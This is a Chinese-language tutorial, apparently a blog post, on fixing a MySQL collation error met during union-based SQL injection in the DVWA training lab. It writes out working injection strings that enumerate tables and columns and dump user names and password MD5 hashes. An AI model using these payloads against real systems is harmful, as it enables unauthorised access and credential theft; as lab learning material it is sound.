SQL注入报错“Illegal mix of collations for operation ‘UNION‘”解决办法

目录

一、原理分析

二、报错原因

1、注入语句

2、分析SQL语句

3、查看union前字段字符集

4、查看union后字段字符集

三、解决方法

1、修改使字符集一致

2、获取table渗透成功

3、获取column渗透成功

4、获取用户名密码成功


在进行DVWA靶场SQL Injection关卡的渗透过程中,当尝试使用联合注入法渗透获取数据库的表名时(注入语句为"-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='dvwa'#"),报错illegal mix of collations for operation 'UNION',本文分析报错原因并给出解决办法。

一、原理分析

"illegal mix of collations for operation 'UNION'"错误发生在MySQL中,这是因为尝试执行UNION操作时,参与UNION的各个查询结果的字符集(collation)不一致导致的。以如下语句为例,需要保证column1,column2和column3,column4的字符集相同。

复制代码
SELECT column1, column2 
FROM table1 
UNION 
SELECT column3, column4 
FROM table2;

如果报错"illegal mix of collations for operation 'UNION'",通常是因为字段字符集不同。例如,第一个表table1的column1和column2字段使用utf8_general_ci,另一个表table2的column3和column4字段使用 utf8_unicode_ci,两者不同即会发生报错信息。

二、报错原因

1、注入语句

当使用-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='dvwa'#语句获取dvwa数据库中所有表格信息时,产生如下报错"Illegal mix of collations for operation 'UNION'",具体如下所示。

2、分析SQL语句

分析DVWA靶场SQL Injection的low级别关卡源码,如下所示。

由于原始SQL语句如下所示,查询的是user表的first_name和last_name。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '$id';

本次注入的命令如下所示。

复制代码
-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

将如上两个命令结合,此步骤渗透的SQL注入语句如下所示。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#;

将这个语句在数据库中执行,效果如下所示,同样报错。

这就是因为UNION前后的语句中select的字段所属的字符集不一致,将union前后拆开后如下所示,即 information_schema.tables中的table_name字符集与user表的first_name和last_name字符集不一致。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '-1' 
union 
select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#;

3、查看union前字段字符集

首先来查看union之前语句的内容,select的内容为users表的first_name, last_name。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '-1'

此时在navicat中找到dvwa数据库,查看user表信息,点击users然后右键,如下图所示。

右键选择设计表,表格变为如下内容,注意SQL语句中的first_name与lastname信息,下图红框内容。

鼠标放到first_name,此时下图红框体现其类型为utf8_unicode_ci。

同样鼠标放到last_name,发现类型同样为utf8_unicode_ci。

4、查看union后字段字符集

我们本次union联合查询的内容为information_schema中的数据库为dvwa的表格(即table_name),这时候我们看一下table_name的相关信息,如下图所示,鼠标点击到information_schema.tables表格中的table_name,类型为utf8_general_ci,如下图所示。

复制代码
select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'

三、解决方法

1、修改使字符集一致

为了确保一致,将user表中的first_name和last_name的字符规则修改一致,改为utf8_general_ci,如下所示。

2、获取table渗透成功

此时在SQL中再次执行语句,此时渗透成功。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#;

注入语句:-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

可得到数据库dvwa中的表名,分别为guestbook与users。

3、获取column渗透成功

输入-1' union select 1, group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'#,可获取users表的所有字段。

这步能渗透成功,是因为字符集一致,完整的SQL注入语句与users表column字符集一致。

复制代码
SELECT first_name, last_name FROM users WHERE user_id = '-1' union select 1, group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'#

4、获取用户名密码渗透成功

输入-1' union select group_concat(user_id,first_name,last_name), group_concat(password) from users #,再次报错。

此时union后面select查询的元素增加了password,查看user表中该元素的字符集,如下所示与改过的first_name和last_name不一致,如下所示。

为了确保password的字符集一致,将password改为与first_name和last_name的字符集合一致,改为utf8_general_ci,如下图所示。

修改后再次渗透,注入成功,可获取用户信息和密码的 MD5 值,解密后可得到明文密码。

相关推荐
ruleslol3 小时前
MySQL的段、区、页、行 详解
数据库·mysql
while(1){yan}3 小时前
MyBatis Generator
数据库·spring boot·java-ee·mybatis
扑火的小飞蛾3 小时前
网络安全小白学习路线图 (基于提供文档库)
学习·安全·web安全
それども3 小时前
MySQL affectedRows 计算逻辑
数据库·mysql
是小章啊4 小时前
MySQL 之SQL 执行规则及索引详解
数据库·sql·mysql
计算机程序设计小李同学4 小时前
个人数据管理系统
java·vue.js·spring boot·后端·web安全
富士康质检员张全蛋4 小时前
JDBC 连接池
数据库
yangminlei4 小时前
集成Camunda到Spring Boot项目
数据库·oracle
ChineHe5 小时前
Redis数据类型篇002_详解Strings核心命令与存储结构
数据库·redis·缓存
清水白石0085 小时前
《从零到进阶:Pydantic v1 与 v2 的核心差异与零成本校验实现原理》
数据库·python